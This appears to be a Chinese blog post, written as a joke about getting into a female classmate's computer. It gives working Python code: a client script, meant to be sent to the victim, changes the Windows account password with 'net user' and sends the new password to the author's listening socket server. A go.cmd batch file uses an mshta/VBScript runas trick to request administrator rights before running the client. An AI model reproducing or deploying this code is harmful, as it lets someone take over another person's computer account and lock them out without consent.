前言

班花加我说她电话坏了让我看看，那肯定义不容辞！【兴奋了半个小时】没别的我就想秀一下技术！五分钟后我修好了，电脑重启之后显示输入密码，当时没多想直接走了。回去之后我能不能用技术远程解析一下这个开机密码呢，说干就干。

工具准备

开发环境：win10、python3.7
开发工具：pycharm

项目思路解析

一想到远程，就想到创建连接，一想到创建链接，就想到socket套接字（一想到套接字，就联想到我没有女朋）

该项目代码为3份（记住自己拿的是服务端的代码，客服端代码和go.cmd是发给别人的）

首先正常流程创建服务端的服务
服务端流程：

创建套接字
-绑定ip和端口
-设置监听
-等待链接
-接受数据打印数据
-关闭链接

    import socket  # 导入socket
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建socket
    server.bind(('192.168.246.1', 44444))  # 绑定IP/端口
    server.listen(5)  # 监听
    print('***********等待连接*********')
    conn, addr = server.accept()  # 连接
    print(conn) 
    print('客户端的地址:', addr)
    client_msg = conn.recv(1024)
    print('客户端修改的密码是: %s' % client_msg)
    conn.close()
    server.close()

windows的修改电脑密码的命令：net User 用户名修改的密码(可以自己动手试一下)

客户端流程：

创建套接字
-连接服务端的IP和端口
-获取当前使用的电脑账户名
-生成随机的电脑密码
-在终端执行修改Windows密码的指令
-发送修改之后的密码
-关闭套接字

    import socket  # 导入用到的模块
    import getpass
    import subprocess
    import random
    
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建socket实例
    client.connect((ip, 端口))  # 连接server端IP地址/端口按你自己实际情况来
    user = getpass.getuser()  # 获取计算机用户名
    print(user)
    psd = ''
    for j in range(1, 9): # 生成1-9的随机数
        m = str(random.randrange(0, 10))
        psd = psd + m
    
    subprocess.Popen(['net', 'User', user, psd])  # 在本地执行（类似于cmd命令）
    client.send(psd.encode('utf-8'))  # 将密码发送给server端
    back_msg = client.recv(1024)
    client.close()  # 关闭socket

到这一步基本就可以自己去尝试了，但是要注意，当前代码只能修改权限是admin的账户。

还在翻呢！！！！！！！！
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
下面会有怎么修改非admin的内容嘛？？？？？？
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*

非admin用户需要提高自己的执行权限
直接使用超级管理员权限执行cmd文件
go.cmd

    @echo off
    %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
    cd /d "%~dp0"
    
    start python client.py

小结

最后我修改密码成功登陆，竟然发现了她的密码！

这铁憨憨C盘满了都不知道清理，一看就是不太懂电脑的亚子！班花那么好看竟然不太懂电脑，真是惊人的发现哩！


点「在看」的人都变好看了哦